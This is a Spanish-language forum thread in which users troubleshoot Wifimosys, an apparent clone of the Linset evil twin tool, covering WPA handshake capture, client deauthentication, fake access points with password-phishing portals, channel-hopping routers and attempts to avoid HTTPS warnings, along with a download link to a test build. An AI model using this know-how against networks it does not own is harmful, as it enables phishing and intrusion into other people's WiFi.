Hola Vodker, ya que cuesta más sacar el handshake y lo veo muy bien esto, ¿podrías incluir la opción de desconectar también al cliente? Creo que es más fácil obtenerlo así pues actualmente sólo desconecta al router (aunque también al cliente pero sin el añadido -c).

Otra cosa, el tema de HTTPS, ¿alguna noticia?

Darte las gracias por crear esta mejora a Linset y todo tu trabajo. Esperando más novedades.

Saludos.


Título: Re: Re: Re:
Publicado por: pikota_mayor en 10-02-2017, 13:21 (Viernes)

Tengo el handshake guardado en la carpeta handshake pero cuando lo copio en wifimosys  .... Me dice archivo no encontrado. Una ayuda porfa. Gracias


Si te dice archivo no encontrado es eso mismo: no encontrado. O sea, que la ruta que has puesto no es correcta.
Si lo tienes en la carpeta /root/handshakes en Wifimosys solo tienes que poner el nombre del mismo y la extensión (ej: wifimosys.cap).
De todas formas te aconsejo capturar el handshake con Wifimosys aunque cueste un poco más (en una de las respuestas de arriba explico porqué).

Saludos.
Hola muchas gracias por contestar. Tengo el handshake capturado en la carpeta root/ handshakes . Pero no entiendo lo que me dices. Donde lo tengo que copiar para que me lo reconozca wifimosys? Le doy botón derecho sobre el archivo.cap y lo pego en wifimosys y me dice no encontrado. Vaya lío. Perdona pero esto se me da muy mal.

enviado desde mi s6 edge + gold 64gb



Título: Re: Re: Re: Re:
Publicado por: jorose1987 en 10-02-2017, 13:43 (Viernes)

Tengo el handshake guardado en la carpeta handshake pero cuando lo copio en wifimosys  .... Me dice archivo no encontrado. Una ayuda porfa. Gracias


Si te dice archivo no encontrado es eso mismo: no encontrado. O sea, que la ruta que has puesto no es correcta.
Si lo tienes en la carpeta /root/handshakes en Wifimosys solo tienes que poner el nombre del mismo y la extensión (ej: wifimosys.cap).
De todas formas te aconsejo capturar el handshake con Wifimosys aunque cueste un poco más (en una de las respuestas de arriba explico porqué).

Saludos.
Hola muchas gracias por contestar. Tengo el handshake capturado en la carpeta root/ handshakes . Pero no entiendo lo que me dices. Donde lo tengo que copiar para que me lo reconozca wifimosys? Le doy botón derecho sobre el archivo.cap y lo pego en wifimosys y me dice no encontrado. Vaya lío. Perdona pero esto se me da muy mal.

enviado desde mi s6 edge + gold 64gb
Tienes que meter el handshake capturado con wifimosys en la carpeta handshakes de la carpeta personal de Wifislax. Una vez lo tengas metido ahí ya te lo reconocerá wifimosys.

Vodker, he encontrado un problema y es que no guarda el handshake cuando el nombre de la red tiene un espacio en blanco. Al menos en la carpeta handshakes no aparece cuando se ha capturado.

Gracias.


Título: Re: Re: Re: Re:
Publicado por: Vodker en 10-02-2017, 14:00 (Viernes)
Citar

Vodker, he encontrado un problema y es que no guarda el handshake cuando el nombre de la red tiene un espacio en blanco. Al menos en la carpeta handshakes no aparece cuando se ha capturado.

Gracias.

Esta tarde-noche haré algunas pruebas a ver qué pasa con eso. Gracias a ti por avisar.


Título: Re: Re: Re: Re: Re: Re:
Publicado por: pikota_mayor en 10-02-2017, 14:34 (Viernes)

Tengo el handshake guardado en la carpeta handshake pero cuando lo copio en wifimosys  .... Me dice archivo no encontrado. Una ayuda porfa. Gracias


Si te dice archivo no encontrado es eso mismo: no encontrado. O sea, que la ruta que has puesto no es correcta.
Si lo tienes en la carpeta /root/handshakes en Wifimosys solo tienes que poner el nombre del mismo y la extensión (ej: wifimosys.cap).
De todas formas te aconsejo capturar el handshake con Wifimosys aunque cueste un poco más (en una de las respuestas de arriba explico porqué).

Saludos.
Hola muchas gracias por contestar. Tengo el handshake capturado en la carpeta root/ handshakes . Pero no entiendo lo que me dices. Donde lo tengo que copiar para que me lo reconozca wifimosys? Le doy botón derecho sobre el archivo.cap y lo pego en wifimosys y me dice no encontrado. Vaya lío. Perdona pero esto se me da muy mal.

enviado desde mi s6 edge + gold 64gb
Tienes que meter el handshake capturado con wifimosys en la carpeta handshakes de la carpeta personal de Wifislax. Una vez lo tengas metido ahí ya te lo reconocerá wifimosys.

Vodker, he encontrado un problema y es que no guarda el handshake cuando el nombre de la red tiene un espacio en blanco. Al menos en la carpeta handshakes no aparece cuando se ha capturado.

Gracias.
El problema esque wifimosys no le saca el handshake de mi red. Lo e tenido que sacar con el handshaker.  Y lo que pregunto es que como hago para meter el handshake capturado con handshaker  en wifimosys y así que este me lo reconozca. No sé si me explico bien. Un saludo y gracias

enviado desde mi s6 edge + gold 64gb



Título: Re:
Publicado por: jorose1987 en 10-02-2017, 14:42 (Viernes)
Yo he probado a meter los handshake capturados por Handshaker y siempre me dice wifimosys que está corrupto cuando no es así. Creo que sólo admite los probados por pyrit.


Título: Re: WIFIMOSYS, clon de LINSET
Publicado por: Vodker en 10-02-2017, 16:28 (Viernes)
Citar

Yo he probado a meter los handshake capturados por Handshaker y siempre me dice wifimosys que está corrupto cuando no es así. Creo que sólo admite los probados por pyrit.


Exacto. La comprobación que hace Wifimosys es mediante pyrit y así se asegura la obtención de un handshake completo y funcional.
Saludos.


Título: Re: WIFIMOSYS, clon de LINSET
Publicado por: jfuentes102 en 10-02-2017, 19:56 (Viernes)
Hey que tal amigos...
he estado probando el script y veo una novedad con una red en particular, y resulta que nunca aparece con clientes. (cosa que es falsa porque a esa red siempre hay alguien conectado). mi pregunta es la siguiente, hay alguna opcion dentro de los routers de movistar (si no estoy mal son mitrastar). que impidan que se vean los clientes que se encuentren conectados a dicha red.
Nota: cabe mencionar que la red tambien tiene el Essid oculto...


Título: Re: WIFIMOSYS, clon de LINSET
Publicado por: La-bestia en 13-02-2017, 02:00 (Lunes)
Es una pena no tener yo una noción en programación porque tengo una excelente idea para todos los evil twin attack como  Linset, Fluxion o este mismo.

La idea sería al crear FAKEAP se oculte la verdadera para que si o si la persona se conecte al punto falso. Lo acabo de probar en mi LG android y ni mi madre que no sabe usar el Paint se traga que haya 2 redes iguales. ¿Como se haría?

Saludos y a seguir trabajando.


Título: Re: WIFIMOSYS, clon de LINSET
Publicado por: La-bestia en 13-02-2017, 02:01 (Lunes)
Hey que tal amigos...
he estado probando el script y veo una novedad con una red en particular, y resulta que nunca aparece con clientes. (cosa que es falsa porque a esa red siempre hay alguien conectado). mi pregunta es la siguiente, hay alguna opcion dentro de los routers de movistar (si no estoy mal son mitrastar). que impidan que se vean los clientes que se encuentren conectados a dicha red.
Nota: cabe mencionar que la red tambien tiene el Essid oculto...


Mi router es de Movistar y es un Mitrastar y si aparecen los clientes ( mi tv lg con WebOS, Android LG )


Título: Re: WIFIMOSYS, clon de LINSET
Publicado por: lalin1204 en 15-02-2017, 15:55 (Mi?rcoles)
hola Vodker primero que todo felicitarlo por este excelente trabajo y decirle que se agradece todo su esfuerzo para realizarlo, todas sus mejoras son muy buenas es como si pasaramos del linset original en ejemplo un windows xp a windows 10 a si lo veo yo , eso si debo aclarar algo no se por que no se puede solucionar el problema de seguridad de https que no aparesca el login o detecte como inseguro, si te enfocas en ese problema, estoy seguro que este seria el mejor clon o actualizacion de linset jamas vista, quiero desearte exitos en tus futuros planes y ojala logres ese fin crear el certificado ssl para wifimosys  >:( >:(


Título: Re: WIFIMOSYS, clon de LINSET
Publicado por: Vodker en 15-02-2017, 19:16 (Mi?rcoles)

no se por que no se puede solucionar el problema de seguridad de https que no aparesca el login o detecte como inseguro


Pues porque es un sistema bastante eficaz (de lo cual todos deberíamos estar agradecidos como internautas a la hora de navegar).
Aún así ahora estoy probando en mis pocos ratitos libres algunos cambios que se traducen en avances reales en HTTPS, pero que hasta ahora solo funciona parcialmente y con pasos "a mano" adicionales. En cuanto pueda (y sepa) integrarlo y que funcione siempre y en todos los casos habrá novedades de Wifimosys.

Saludos y gracias !!!


Título: Re:
Publicado por: jorose1987 en 17-02-2017, 01:49 (Viernes)
Vodker, ¿puedes corregir que en redes que llevan de nombre un espacio no guarda el handshake en su carpeta?

Otra cosa, ¿se puede modificar este ataque para que siga funcionando incluso cuando la red cambia de canal?

Y por último, ¿existe alguna versión de Wifislax que incluya wifimosys ya instalado? No encuentro la última versión de testeo disponible. Las que hay son de finales del año pasado.

Esperando con ganas esa actualuzación con SSL si lo consigues. Un saludo y gracias

Gracias por todo.


Título: Re:
Publicado por: zaratustra en 17-02-2017, 12:25 (Viernes)
Vodker, ¿puedes corregir que en redes que llevan de nombre un espacio no guarda el handshake en su carpeta?

Otra cosa, ¿se puede modificar este ataque para que siga funcionando incluso cuando la red cambia de canal?

Y por último, ¿existe alguna versión de Wifislax que incluya wifimosys ya instalado? No encuentro la última versión de testeo disponible. Las que hay son de finales del año pasado.

Esperando con ganas esa actualuzación con SSL si lo consigues. Un saludo y gracias

Gracias por todo.

Con respecto a las redes de fibra de Movistar que llevan el router Mitrastar pasa eso, en el momento que empiezas a hacer el ataque, el router cambia de canal con lo que se queda en nada, comprobado


Título: Re: WIFIMOSYS, clon de LINSET
Publicado por: kakaflo en 17-02-2017, 12:44 (Viernes)
Buenas,

Estoy usando Wifimosys desde Wifislax en Vmware con una antena TP-LINK TL-WN722N.

Al abrir la herramienta me sale este error y luego se me cierra:
(http://i1203.photobucket.com/albums/bb381/kakaflo/wifimosys_zpsd9uebudv.png)

¿Qué puede estar sucediendo?

Gracias de antemano y saludos.


Título: Re: WIFIMOSYS, clon de LINSET
Publicado por: Vodker en 17-02-2017, 13:17 (Viernes)
Me ha ocurrido algunas veces en VMWare que deja de detectar el adaptador y Wifimosys lógicamente no lo encuentra y tira el error.
Simplemente vuelve a conectarlo  ;)


Título: Re: WIFIMOSYS, clon de LINSET
Publicado por: jfuentes102 en 18-02-2017, 15:04 (S?bado)
Monta nuevamente la maquina a ver como te va.


Título: Re: WIFIMOSYS, clon de LINSET
Publicado por: Vodker en 21-02-2017, 10:18 (Martes)
Es una pena no tener yo una noción en programación porque tengo una excelente idea para todos los evil twin attack como  Linset, Fluxion o este mismo.

La idea sería al crear FAKEAP se oculte la verdadera para que si o si la persona se conecte al punto falso. Lo acabo de probar en mi LG android y ni mi madre que no sabe usar el Paint se traga que haya 2 redes iguales. ¿Como se haría?

Saludos y a seguir trabajando.

¿Tú no crees que si lo que propones se pudiese realizar ya estaría hecho?
Para ocultar el AP original primero has de entrar a su config y para eso necesitas estar en su red y por tanto el pass de la wifi.

Saludos.


Título: Re:
Publicado por: Vodker en 21-02-2017, 20:17 (Martes)
Vodker, ¿puedes corregir que en redes que llevan de nombre un espacio no guarda el handshake en su carpeta?

Otra cosa, ¿se puede modificar este ataque para que siga funcionando incluso cuando la red cambia de canal?

Y por último, ¿existe alguna versión de Wifislax que incluya wifimosys ya instalado? No encuentro la última versión de testeo disponible. Las que hay son de finales del año pasado.

Esperando con ganas esa actualuzación con SSL si lo consigues. Un saludo y gracias

Gracias por todo.

He hecho pruebas y efectivamente, cuando una red tiene espacios el handshake no se guarda en la carpeta "handshakes". Sin embargo lo puedes copiar desde /tmp/wifimosys. Esto no afecta al ataque (ver foto). Intentaré corregirlo próximamente, al igual que lo del cambio de canal.
Ah, y la versión de 64 bits (https://foro.seguridadwireless.net/live-wifislax/liberada-wifislax64-1-0-version-final-para-descargar/ (https://foro.seguridadwireless.net/live-wifislax/liberada-wifislax64-1-0-version-final-para-descargar/)) ya lo tiene incluido.
Saludos.
(http://fotos.subefotos.com/84bfa0deb4fa06d2aa033b7985c94c5ao.jpg)


Título: Re:
Publicado por: jorose1987 en 21-02-2017, 20:53 (Martes)
Muchas gracias Vodker, esperando esa nueva versión con sus arreglos. Lo del cambio de canal estaría genial. También desautentificar a un cliente como otra opción para conseguir el handshake ya que actualmente sólo lo hace al AP.

Gracias por todo y un saludo.


Título: Re: WIFIMOSYS, clon de LINSET
Publicado por: kakaflo en 23-02-2017, 14:33 (Jueves)
Me ha ocurrido algunas veces en VMWare que deja de detectar el adaptador y Wifimosys lógicamente no lo encuentra y tira el error.
Simplemente vuelve a conectarlo  ;)

Muchas gracias. Al final me decidí por usar una máquina virtual con Wifislax 64 bits que trae la herramienta integrada, y ya me detecta el adaptador wifi.

El problema que me encuentro es que al entrar yo en el AP falso Wifimosys detecta que un cliente intenta conectarse, pero cuando introduzco varias contraseñas no me aparecen en la ventana como contraseñas erróneas introducidas. ¿Le pasa a alguien más?

EDITADO: De hecho, ni me captura la contraseña. Al introducirla es como si no pasara nada (ni la acepta el navegador web ni Wifimosys).

EDITADO2: El fallo está en que no me salen las ventanas emergentes de contraseña errónea y no se registra la introducción de la contraseña. En mi red no me sale, pero en otra que está un poco más cerca de mí sí me salen las erróneas metidas cuando yo mismo me conecto al AP falso.


Título: Re: WIFIMOSYS, clon de LINSET
Publicado por: Vodker en 24-02-2017, 02:36 (Viernes)
Es imposible por coj*nes probar con éxito el script en tooooodas las marcas y modelos de AP's del mercado, así como en toooodos los hardwares y sistemas de clientes "víctimas" (sobremesas de diferentes versiones de Windows o Mac, IOS, Android, Winphones, etc.), espero que todo el mundo sea consciente de esto.
Se agradecen los reportes de errores pero si no indicáis marca y modelo del escenario donde falla, poco se puede hacer para solventarlo.
Y sobre todo recordad que yo no tengo ni p*ta idea de programar, que para mi lo del "ensayo y error" es el día a día en estos temas y solo salgo adelante con algunas cosillas que me propongo por pura cabezonería  ;D
Saludos.


Título: Re:
Publicado por: jorose1987 en 24-02-2017, 19:27 (Viernes)
Exacto Vodker, demasiado has hecho ya modificando a mejor Linset con este gran clon y más sin saber mucho de programación. Esperando nuevas actualizaciones. Gracias por todo.


Título: Re: WIFIMOSYS, clon de LINSET
Publicado por: kakaflo en 07-03-2017, 18:04 (Martes)
Es imposible por coj*nes probar con éxito el script en tooooodas las marcas y modelos de AP's del mercado, así como en toooodos los hardwares y sistemas de clientes "víctimas" (sobremesas de diferentes versiones de Windows o Mac, IOS, Android, Winphones, etc.), espero que todo el mundo sea consciente de esto.
Se agradecen los reportes de errores pero si no indicáis marca y modelo del escenario donde falla, poco se puede hacer para solventarlo.
Y sobre todo recordad que yo no tengo ni p*ta idea de programar, que para mi lo del "ensayo y error" es el día a día en estos temas y solo salgo adelante con algunas cosillas que me propongo por pura cabezonería  ;D
Saludos.


Perdón, no fue mi intención ofender a nadie. Doy mil gracias por la herramienta y alabo tu esfuerzo por mejorarla día a día.

El router es TP-LINK TL-WR841N. Cambié mi router por el que me dio la compañía y ya si sale el aviso de la contraseña y detecta su introducción. Me ralló que no me saliera a veces cuando me acordé de que se comentó que en las páginas HTTPS no aparece.


Título: Re:
Publicado por: kumurikage en 12-03-2017, 22:23 (Domingo)
Vodker, ¿puedes corregir que en redes que llevan de nombre un espacio no guarda el handshake en su carpeta?

Otra cosa, ¿se puede modificar este ataque para que siga funcionando incluso cuando la red cambia de canal?

Y por último, ¿existe alguna versión de Wifislax que incluya wifimosys ya instalado? No encuentro la última versión de testeo disponible. Las que hay son de finales del año pasado.

Esperando con ganas esa actualuzación con SSL si lo consigues. Un saludo y gracias

Gracias por todo.


He hecho pruebas y efectivamente, cuando una red tiene espacios el handshake no se guarda en la carpeta "handshakes". Sin embargo lo puedes copiar desde /tmp/wifimosys. Esto no afecta al ataque (ver foto). Intentaré corregirlo próximamente, al igual que lo del cambio de canal.
Ah, y la versión de 64 bits (https://foro.seguridadwireless.net/live-wifislax/liberada-wifislax64-1-0-version-final-para-descargar/ (https://foro.seguridadwireless.net/live-wifislax/liberada-wifislax64-1-0-version-final-para-descargar/)) ya lo tiene incluido.
Saludos.
(http://fotos.subefotos.com/84bfa0deb4fa06d2aa033b7985c94c5ao.jpg)


amigo por que a mi no me funciona en el canal 13 el fake ap? (se debe a mi tarjeta mini pci ar 9485?)

que tarjeta usas?

uso la ultima version para 64


Título: Re:
Publicado por: jorose1987 en 12-03-2017, 22:26 (Domingo)
Creo que puede ser de la tarjeta inalámbrica pero también puede ser de algún bug de Linset. Ahora bien hay gente que le funciona en ese canal. A ver si te ayudan porque a mí también me interesa saberlo. Yo tengo un ralink 3070.


Título: Re:
Publicado por: Vodker en 12-03-2017, 23:20 (Domingo)

amigo por que a mi no me funciona en el canal 13 el fake ap? (se debe a mi tarjeta mini pci ar 9485?)

que tarjeta usas?

uso la ultima version para 64


Yo diría que es cosa de las tarjetas. Creo recordar que según donde esté fabricada, accede al canal 13 o no dependiendo de la regulación de radiofrecuencias de ese país. Pero como digo es algo que me suena haber leído, igual he dicho una burrada.
Lo que sí confirmo es que al script le da igual el canal funcionando en todos. La tarjeta que uso habitualmente es una Ralink 2870/3070.

Saludos.


Título: Re: WIFIMOSYS, clon de LINSET
Publicado por: m4ld170 en 12-03-2017, 23:32 (Domingo)
Acabo de probar la ultima version de wifislaxx64 con este ultimo Wifimosis, en primer lugar dar gracias a sus concebidores, el tema es que he recibido un router de la compañia Swisscom  y pues me puse a trastearlo, con wps es mposible pues se bloquea como una piedra XD y no da respuestas de pin alguna, por otra parte me dio por trastearle con wifimosys, bueno en mi conclusion y caso concreto si me crea bien al ap y todo lo demas pero cuando intento acceder a la fake red "open" a veces me sale red fuera de rango cuando la estoy viendo en mis narices, y se encuentra a centimetros del falso ap, bueno no es siempre eso pero me sucede, he accedido al fake ap cn el movil de mi esposa y ahi salta al momento el fake ap, nomas se conecta ya le esta saliendo el index, no pasa lo mismo con mis otros pc 3, los 3 se conectan bien al fake ap pero en NINGUN MOMENTO me redirige al  index en cuestion, simplemente se queda cargando y cargando el navegador sin abrirme el fake index como digo, a menos que meta manualmente la direccion 192.169.1.1, ahi si despues de unos 30 o 40 segundos dando vueltas el navegador accede pero eso, solo poniendolo manualmente., si te sirve de algo eso me pasa con un ruter de la compañia Swisscom y el ruter es marca Centro Grande, solo  dejo mi comentario como tip y dato curioso un saludo y suerte a todos


Título: Re:
Publicado por: kumurikage en 13-03-2017, 00:50 (Lunes)

amigo por que a mi no me funciona en el canal 13 el fake ap? (se debe a mi tarjeta mini pci ar 9485?)

que tarjeta usas?

uso la ultima version para 64


Yo diría que es cosa de las tarjetas. Creo recordar que según donde esté fabricada, accede al canal 13 o no dependiendo de la regulación de radiofrecuencias de ese país. Pero como digo es algo que me suena haber leído, igual he dicho una burrada.
Lo que sí confirmo es que al script le da igual el canal funcionando en todos. La tarjeta que uso habitualmente es una Ralink 2870/3070.

Saludos.

gracias por la respuesta entonces no tiene solucion como tal si compro una usb como la tplink722 como sabre si permite ese rango de canales para fake ap?



Título: Re: WIFIMOSYS, clon de LINSET
Publicado por: drvalium en 13-03-2017, 02:26 (Lunes)
hi

tienes que mirar que canales permite tu país, el número de canales va implementado en el firmware o los drivers, si te compras uno vía japón, teóricamente tendrás 14 canales.


Título: Re: WIFIMOSYS, clon de LINSET
Publicado por: kley en 18-03-2017, 11:38 (S?bado)
 buenos dias, a ver si alguien me puede echar una manilla, resulta que tanto
wifimosys como linset me da esta respuesta al escanear redes.



wc: /tmp/Wifimosys/dump-01.csv: No existe el fichero o el directorio
/usr/bin/wifimosys: línea 396: [: -le: se esperaba un operador unario
cat: /tmp/Wifimosys/dump-01.csv: No existe el fichero o el directorio
expr: error de sintaxis
                        LISTADO DE REDES

  Nº    MAC                     CANAL    TIPO     PWR     NOMBRE DE LA RED

grep: el: No existe el fichero o el directorio
grep: número: No existe el fichero o el directorio
grep: de: No existe el fichero o el directorio
grep: líneas: No existe el fichero o el directorio
grep: no: No existe el fichero o el directorio
grep: es: No existe el fichero o el directorio
grep: válido:: No existe el fichero o el directorio
grep: «/tmp/Wifimosys/dump-01.csv»: No existe el fichero o el directorio
  1)    head: el número de líneas no es válido: «/tmp/Wifimosys/dump-01.csv»                      100%   

          (*) En rojo: redes con posibles clientes activos

          Selecciona el nº de la red a atacar...
          (Para reescanear pulsa r Para salir pulsa x)



 lo raro es que fluxion funciona bien, uso una antena alfa chipset 3070  en
 la ultima version de wifislax,
es la segunda vez que me ocurre este error.
La primera vez borre el sistema lo volvi a instalar y asunto solucionado. ;D
Esta vez antes de formatear de nuevo,pues tengo el sistema personalizado y
actualizado he decidido consultarlo aqui en el foro, en busca de alguna
solucion  ???   gracias.


Título: Re: WIFIMOSYS, clon de LINSET
Publicado por: Vodker en 18-03-2017, 13:05 (S?bado)
buenos dias, a ver si alguien me puede echar una manilla, resulta que tanto
wifimosys como linset me da esta respuesta al escanear redes.



wc: /tmp/Wifimosys/dump-01.csv: No existe el fichero o el directorio
/usr/bin/wifimosys: línea 396: [: -le: se esperaba un operador unario
cat: /tmp/Wifimosys/dump-01.csv: No existe el fichero o el directorio
expr: error de sintaxis
                        LISTADO DE REDES

  Nº    MAC                     CANAL    TIPO     PWR     NOMBRE DE LA RED

grep: el: No existe el fichero o el directorio
grep: número: No existe el fichero o el directorio
grep: de: No existe el fichero o el directorio
grep: líneas: No existe el fichero o el directorio
grep: no: No existe el fichero o el directorio
grep: es: No existe el fichero o el directorio
grep: válido:: No existe el fichero o el directorio
grep: «/tmp/Wifimosys/dump-01.csv»: No existe el fichero o el directorio
  1)    head: el número de líneas no es válido: «/tmp/Wifimosys/dump-01.csv»                      100%   

          (*) En rojo: redes con posibles clientes activos

          Selecciona el nº de la red a atacar...
          (Para reescanear pulsa r Para salir pulsa x)



 lo raro es que fluxion funciona bien, uso una antena alfa chipset 3070  en
 la ultima version de wifislax,
es la segunda vez que me ocurre este error.
La primera vez borre el sistema lo volvi a instalar y asunto solucionado. ;D
Esta vez antes de formatear de nuevo,pues tengo el sistema personalizado y
actualizado he decidido consultarlo aqui en el foro, en busca de alguna
solucion  ???   gracias.

Parece que el fichero /tmp/Wifimosys/dump-01.csv se crea con algún error.
¿Es posible que alguna de las redes que has escaneado tenga algún carácter extraño (Ñ, #,@, etc) y por eso se corrompa el archivo?
Espero respuesta para si es así, intentar solucionarlo.
Saludos.


Título: Re: WIFIMOSYS, clon de LINSET
Publicado por: kley en 18-03-2017, 13:55 (S?bado)
hola vodcker, gracias por contestar.
no he escaneado ninguna red con esos caracteres, lo único que he notado con la otra vez que me paso es que justo andaba cacharreando con dos antenas externas a la vez, no se si algo tendrá que ver pero el caso que ahora con
airmon-ng start wlan1 me arroja esto


  860 NetworkManager
  939 wpa_supplicant

PHY     Interface       Driver          Chipset

phy0    wlan0           ath5k           Qualcomm Atheros AR242x / AR542x Wireless Network Adapter (PCI-Express) (rev 04)
phy4    wlan1mon        rt2800usb       Ralink Technology, Corp. RT2870/RT3070


asi que no tengo ni idea pero me temo que tendre que reinstalar si quiero disfrutar del sistema completo. o me equivoco?
 ;D un saludo


Título: Re: WIFIMOSYS, clon de LINSET
Publicado por: Vodker en 18-03-2017, 13:59 (S?bado)
Es lo que tiene el cacharrear, que cuando algo sale mal hemos de atenernos a las consecuencias....  ;D
¡Saludos!


Título: Re: WIFIMOSYS, clon de LINSET
Publicado por: kley en 18-03-2017, 14:05 (S?bado)
asi es.......... ja.ja


Título: Re: WIFIMOSYS, clon de LINSET
Publicado por: kumurikage en 18-03-2017, 18:35 (S?bado)
alguien sabe como montar el handshake en wifimosys?? lo pongo en la carpeta temp/wifimosys y no lo detecta


Título: Re: WIFIMOSYS, clon de LINSET
Publicado por: dynyly en 18-03-2017, 19:19 (S?bado)
salu2
no se monta hanskake
se da dirrecion en la pantalla cuando te dice si tienes uno mete direccion del hanskake

puedes tenerlo en donde quieras solo has de añadir la direccion donde esta el hanskake
yo lo uso en escritorio

/root/Desktop/mi.cap
------------
no es la carpeta temp aun asi  aunque lo metas en la direccion
es  /tmp /wifimosis/mi.cap
tendras que decirle a wifimosys en la pantalla que te pide la direccion del cap o hanskake como queramos llamarlo



Título: Re: WIFIMOSYS, clon de LINSET
Publicado por: kumurikage en 18-03-2017, 19:50 (S?bado)
salu2
no se monta hanskake
se da dirrecion en la pantalla cuando te dice si tienes uno mete direccion del hanskake

puedes tenerlo en donde quieras solo has de añadir la direccion donde esta el hanskake
yo lo uso en escritorio

/root/Desktop/mi.cap
------------
no es la carpeta temp aun asi  aunque lo metas en la direccion
es  /tmp /wifimosis/mi.cap
tendras que decirle a wifimosys en la pantalla que te pide la direccion del cap o hanskake como queramos llamarlo



de hecho realice ambas opciones pero nunca me lo reconoce incluso arrastre y pegue dirreccion y nada


Título: Re: WIFIMOSYS, clon de LINSET
Publicado por: drvalium en 18-03-2017, 20:02 (S?bado)
Apuesto a que ese Handshake está corrupto.


saludos


Título: Re: WIFIMOSYS, clon de LINSET
Publicado por: Vodker en 18-03-2017, 20:02 (S?bado)
alguien sabe como montar el handshake en wifimosys?? lo pongo en la carpeta temp/wifimosys y no lo detecta

Lo ideal es ponerlo en /root/handshakes. En ese caso en Wifimosys solo habrás de poner el nombre y la extensión (XXXXX.cap).
Si lo tienes en otro lugar tienes que poner la ruta completa.
Si aún así no lo acepta, es que está corrupto como dice drvalium, pero eso ya te lo dirá el script al comprobarlo.
Saludos.


Título: Re: WIFIMOSYS, clon de LINSET
Publicado por: kumurikage en 19-03-2017, 14:47 (Domingo)
alguien sabe como montar el handshake en wifimosys?? lo pongo en la carpeta temp/wifimosys y no lo detecta

Lo ideal es ponerlo en /root/handshakes. En ese caso en Wifimosys solo habrás de poner el nombre y la extensión (XXXXX.cap).
Si lo tienes en otro lugar tienes que poner la ruta completa.
Si aún así no lo acepta, es que está corrupto como dice drvalium, pero eso ya te lo dirá el script al comprobarlo.
Saludos.

de hecho tanto en linset y fluxion me lo acepta en el wifimosys simplemente no lo acpeta

actualizo tenia que ponerlo en la carpeta root handshake y funciono



Título: Re: WIFIMOSYS, clon de LINSET
Publicado por: ampamer en 21-03-2017, 01:12 (Martes)
Hola vodker , muy bueno este modulo que has hecho te agradezco, pero tengo una consulta estoy realizando las pruebas en un router de la marca hitron y el problema esque cuando pongo en marcha el ataque el router cambia de canal automáticamente , me preguntaba si esto afecta el ataque y si es así hay alguna manera de solucionarlo ?


Título: Re: WIFIMOSYS, clon de LINSET
Publicado por: Vodker en 21-03-2017, 12:11 (Martes)
Espero tener arreglado para la próxima versión el tema del cambio de canales de algunos routers.
De hecho, en teoría creo que ya lo tengo resuelto pero no he podido probarlo al no disponer de uno de estos modelos, aunque ya está apalabrado para que pronto me cedan un cacharro y hacer los últimos trasteos ;)
Saludos.


Título: Re:
Publicado por: jorose1987 en 21-03-2017, 15:49 (Martes)
Estupendo Vodker, esperando esa nueva versión con ansias. Lo del cambio de canal está muy bien que lo hayas implementado ya que cada vez que se reinicia el router atacado cambia automáticamente de canal y el ataque ya no sirve pues no desconecta a los clientes. Eso sí sólo pasa cuando en el router no tiene un canal fijo elegido.

Saludos.


Título: Re: WIFIMOSYS, clon de LINSET
Publicado por: Vodker en 27-03-2017, 16:12 (Lunes)
¿Alguien con Wifislax64, cierta soltura en usar Wifimosys y suficientes cacharretes (adaptadores y routers) para trastear se ofrece para probar una nueva versión de prueba y comentar los resultados?

https://mega.nz/#!UtgAyABJ!tHsZaRjj0mIU2DBywn9j9NzrDosZZHob4FidNMYm6_E (https://mega.nz/#!UtgAyABJ!tHsZaRjj0mIU2DBywn9j9NzrDosZZHob4FidNMYm6_E)

Gracias de antemano y saludos.


Título: Re: WIFIMOSYS, clon de LINSET
Publicado por: USUARIONUEVO en 27-03-2017, 22:29 (Lunes)
no quiero meter prisas  ;D

pero , creo que no voy a tardar mucho en soltar iso , hoy he estado trasteando , y ya tengo los drivers nvidia/amd  y demas preparados.


Creo que lo vital y de lo que mas se han quejado es del tema en el salto de canal en algunos routers , asi qyue a probar.  ;) 8)


Título: Re: WIFIMOSYS, clon de LINSET
Publicado por: Vodker en 27-03-2017, 22:48 (Lunes)

no quiero meter prisas  ;D


Pero metes  ;D

He cambiado la desautentificación de aireplay-ng a wifijammer.py (incluído en la 64) y probando la última versión de wifijammer de hace un par de semanas Wifimosys necesita unos pequeños cambios para cerrar el programa (de python a python2). Lo que he subido funciona en Wifislax64 pero si actualizas wifijammer a la última avísame y le hago los retoques al script.

Saludos!


Título: Re: WIFIMOSYS, clon de LINSET
Publicado por: USUARIONUEVO en 27-03-2017, 23:30 (Lunes)
segun sistema tengo la 0.9.3  ¿hay nueva? o es version git ?

pues tu diras

https://github.com/DanMcInerney/wifijammer/blob/master/wifijammer.py

si quieres pongo esa ...creo ninguna tool lo utiliza asi que los cambios te afectaran solo a ti.


Título: Re:
Publicado por: jorose1987 en 28-03-2017, 01:07 (Martes)
Excelente Vodker por la nueva actualización y USUARIONUEVO. Esperemos que todo funcione bien en cuanto a las nuevas novedades.

A ver los comentarios de los compañeros cuando la prueben.


Título: Re: WIFIMOSYS, clon de LINSET
Publicado por: kley en 28-03-2017, 06:59 (Martes)
buenas, probado en mi zte con dos adaptadores diferentes y todo ok, incluido
sonido  ;D , solo en una de las pruebas no reconocia el handshake de la
carpeta /root/hanshake, pero ya digo, una sola vez, en general funciona bien.
buen trabajo como siempre, un saludo.


Título: Re:
Publicado por: jorose1987 en 28-03-2017, 10:15 (Martes)
Vodker, ¿qué novedades trae?


Título: Re:
Publicado por: Vodker en 28-03-2017, 10:24 (Martes)
Vodker, ¿qué novedades trae?

- La comprobación del handshake con pyrit ahora es más permisiva, dándolo por bueno en los estados good y workable.
- Omitidas del listado de redes las que no tienen seguridad implementada.
- Mejor identificación de las redes ocultas cuando tienen clientes y se difunde el nº de caracteres del nombre oculto.
- Desautentificación mejorada con wifijammer en lugar de aireplay-ng (no he podido probarlo con routers que hacen channel hopping, pero en teoría ahora desautentifica a los clientes conectados, no al punto de acceso).
- Y alguna cosa de la que no me acuerdo  ;D

Saludos!


Título: Re:
Publicado por: jorose1987 en 28-03-2017, 11:02 (Martes)
Qué grande eres Vodker. Está quedando genial esta aplicación. Imagino que también funciona en Wifislax v4.12, ¿no? Gracias por todo tu trabajo Vodker.


Título: Re:
Publicado por: jorose1987 en 28-03-2017, 15:48 (Martes)
Vodker, probado en Wifislax v4.12 y no funciona e imagino que es porque no tiene wifijammer instalado. En Wifislax de 64 bits sí funciona.

He visto que ahora durante el ataque si quieres volver a escanear redes ya no está la opción esa y ahora te obliga a salir del programa.

Aún estoy probando lo del cambio de canal y no puedo decir cómo va pero pinta todo muy bien.


Título: Re:
